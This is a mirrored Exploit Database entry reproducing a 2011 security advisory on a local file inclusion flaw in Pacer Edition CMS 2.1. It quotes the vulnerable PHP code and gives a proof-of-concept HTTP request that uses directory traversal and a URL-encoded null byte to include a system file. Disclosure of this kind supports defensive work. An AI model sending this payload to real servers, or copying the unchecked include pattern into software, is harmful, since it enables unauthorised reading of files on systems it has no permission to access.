Pacer Edition CMS 2.1 – ‘l’ Local File Inclusion

• Exploit Database
• 9 阅读

• 作者： LiquidWorm
  日期： 2011-06-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17379/

• Pacer Edition CMS 2.1 (l param) Local File Inclusion Vulnerability
  
  Vendor: The Pacer Edition
  Product web page: http://www.thepaceredition.com
  Affected version: RC 2.1 (SVN: 867)
  
  Summary: The 'Pacer Edition' is a Content Management System(CMS)
  written using PHP 5.2.9 as a minimum requirement. The Pacer Edition
  CMS was based from Website baker core and has been completely
  redesigned with a whole new look and feel along with many new
  advanced features to allow you to build sites exactly how you want
  and make them, 100% yours!
  
  Desc: Pacer Edition CMS suffers from a local file inlcusion
  vulnerability when input passed thru the 'l' parameter to
  admin/login/forgot/index.php script is not properly verified
  before being used to include files. This can be exploited to
  include files from local resources with directory traversal
  attacks and URL encoded NULL bytes.
  
  
  /admin/login/forgot/index.php (line: 59-62):
  ----------------------------------------------------------------
  
  $lang_id = ((isset($_GET['l'])) ? $_GET['l'] : '');
  if ($lang_id == '') $lang_id = (LANGUAGE) ? LANGUAGE : (DEFAULT_LANGUAGE) ? DEFAULT_LANGUAGE : 'EN';
  if (!file_exists(PE_PATH.'/languages/'.$lang_id.'.php')) $lang_id = 'EN'; 
  require (PE_PATH.'/languages/'.$lang_id.'.php');
  
  ----------------------------------------------------------------
  
  
  Tested on: Microsoft Windows XP Professional SP3 (EN)
   Apache 2.2.14 (Win32)
   PHP 5.3.1
   MySQL 5.1.41
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  liquidworm gmail com
  Zero Science Lab
  
  
  Advisory ID: ZSL-2011-5019
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5019.php
  
  
  
  07.06.2011
  
  
  PoC:
  
  ----------------------------------------------------------------
  
  POST /admin/login/forgot/index.php?l=..%2f..%2f..%2f..%2f..%2fboot.ini%00 HTTP/1.1
  Host: localhost
  Proxy-Connection: keep-alive
  User-Agent: thricer
  Content-Length: 2
  Cache-Control: max-age=0
  Origin: null
  Content-Type: multipart/form-data; boundary=----x
  Accept: text/html
  Accept-Language: en-US,en;q=0.8
  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
  
  ------x
  Content-Disposition: form-data; name="email"
  
  sm
  ------x--
  
  ----------------------------------------------------------------